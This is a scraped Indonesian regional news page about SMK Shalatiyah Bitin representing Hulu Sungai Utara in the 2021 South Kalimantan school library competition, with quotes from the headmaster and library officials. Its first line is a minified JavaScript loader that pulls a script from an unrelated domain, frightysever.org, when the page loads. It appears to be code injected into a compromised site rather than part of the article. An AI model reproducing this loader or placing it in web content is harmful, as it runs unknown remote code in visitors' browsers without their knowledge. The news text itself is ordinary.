(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Wakil HSU Lomba Perpustakaan Sekolah se Kalsel, Ini Kata Kepsek SMK Shalatiyah Bitin


KANALKALIMANTAN.COM, AMUNTAI – SMK Shalatiyah Bitin, Kecamatan Danau Panggang, Kabupaten Hulu Sungai Utara (HSU) kembali dipercaya mewakili Kabupaten HSU dalam lomba perpustakaan sekolah tingkat SLTA se Kalimantan Selatan tahun 2021.

Kepala Sekolah SMK Shalatiyah Bitin, Ahmad Auria mengaku bersyukur untuk kali kedua Dinas Perpustakaan dan Arsip (Dispersip) Kabupaten Hulu Sungai Utara (HSU) memberikan kepercayaan kepada SMK Shalatiyah Bitin, mewakili Kabupaten HSU mengikuti lomba perpustakaan sekolah tingkat SLTA se Kalimantan Selatan tahun 2021, setelah tahun sebelumnya meraih peringkat kedua.

“Harapan kami, kami bisa menjadi lebih baik kedepannya nanti SMK Shalatiyah ini bisa menjadi tangan kanan dari perpustakaan di Kalimantan Selatan, dalam arti kita bisa menyalurkan ilmu pengetahuan,” kata Ahmad Auria saat menyambut tim penilai Dispersip Provinsi Kalsel di SMK Shalatiyah di Desa Bitin, Danau Panggang, Senin (19/4/2021) siang.

Baca juga : 12 Klub Membelot ke Liga Super Eropa, Semifinal Liga Champions Ditunda?

Lebih lanjut, menurut Auria selama ini baik di
SMA maupun SMK lebih memfokuskan kepada proses pembelajaran dan praktek, sehingga meninggalkan satu hal yang sering terlupakan yaitu jantungnya sekolah yakni perpustakaan.

Jadi ke depan perpustakaan semakin banyak yang harus diperbaiki dalam hal pengelolaan perpustakaan.

“Mudahan-mudahan karena itu, kita ikut kembali meningkatkan kualitas perpustakaan, kedepannya kita dapat lebih bagus lagi,” imbuhnya.

Sekertaris Dispersip HSU M Jahri saat mendampingi tim penilai, menyambut baik kedatangan tim penilai lomba perpustakaan sekolah tingkat SLTA se Kalsel tahun 2021 di SMK Shalatiyah Bitin.

Pada tahun 2021, SMK Shalatiyah Bitin, kembali mewakili kabupaten HSU dalam
lomba perpustakaan sekolah tingkat SLTA se Kalimantan Selatan.

Baca juga : Soal Kegaduhan UEFA vs European Super League, Ini Respons FIFA

“Harapan kita, agar perpustakaan sekolah ini bertambah maju dan menjadi kebanggaan,” ujar Jahri.

Karena peran perpustakaan sekolah ini memiliki peran ganda, yakni tidak hanya untuk kepentingan para siswa, akan tetapi juga merambah untuk kepentingan masyarakat dengan adanya perpustakaan sekolah yang lokasinya di luar sekolah untuk masyarakat umum.

“Dengan adanya fungsi ganda dari perpustakaan, kita harapkan perpustakaan lebih banyak dimanfaatkan oleh masyarakat,” imbuhnya.

Baca juga : Menkes Budi Serahkan Santunan Kematian Nakes yang Gugur Akibat Covid-19

Sementara itu, H Muhammad, tim penilai mengatakan disamping melakukan penilaian yang umum dilakukan setiap tahunnya, dalam kegiatan ini pihaknya juga sekaligus dapat melakukan pembinaan terhadap beberapa sekolah di beberapa kabupaten/kota di Kalsel.

“Dari lomba ini, kita berharap ada perpustakaan-perpustakan yang lebih meningkat setiap tahunnya,” katanya.

Ia menambahkan, adapun beberapa poin penilaian dalam lomba, di antaranya terkait kelembagaannya, fasilitas gedung, akreditasi, perabotan, koleksi, program-program perpustakaan, anggaran, dan tenaga pustakawan.

Baca juga : Apple: Tanpa Charger, iPhone 12 Hemat 861.000 Ton Logam

Adapun selama melakukan penilaian di Kabupaten HSU, disamping mengunjungi SMK Shalatiyah Bitin, Tim penilai juga melakukan penilaian terhadap perpustakaan desa di Desa Tambalangan, Kecamatan Amuntai Tengah (kanalkalimantan.com/dew)

 

Reporter : Dew
Editor : Bie

 

 

 


Al Ghifari

Recent Posts

Begini Penjelasan Disporabudpar Banjarbaru Soal Perizinan Hotel Aeris

KANALKALIMANTAN.COM, BANJARBARU – Sebuah hotel baru di ruas Jalan Panglima Batur Banjarbaru akan melakukan soft… Read More

7 jam ago

Gerilya Politik Lisa Halaby ke Nasdem Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Langkah politik Erna Lisa Halaby mencari partai politik pengusung dalam Pemilihan Wali… Read More

7 jam ago

Tim Wasev Cek Langsung Lokasi TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana bersama Tim Pengawas… Read More

8 jam ago

Lutung Tersengat Listrik Dievakuasi Warga, Damkar HSU Amankan Satwa Dilindungi

KANALKALIMANTAN.COM, AMUNTAI - Tersengat aliran listrik bertegangan tinggi, seekor satwa dilindungi lutung terkapar berhasil dievakuasi… Read More

8 jam ago

“Pesta Siswa Literasi Digital” di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Teknologi yang saat ini berkembang sangat pesat dan cepat telah membuat perubahan… Read More

9 jam ago

Kontestasi Pilwali Banjarbaru, Golkar Partai Pertama Incaran Lisa Halaby

Lisa Halaby: Saya Siap, Insyaallah Mundur Sebagai ASN Read More

10 jam ago

This website uses cookies.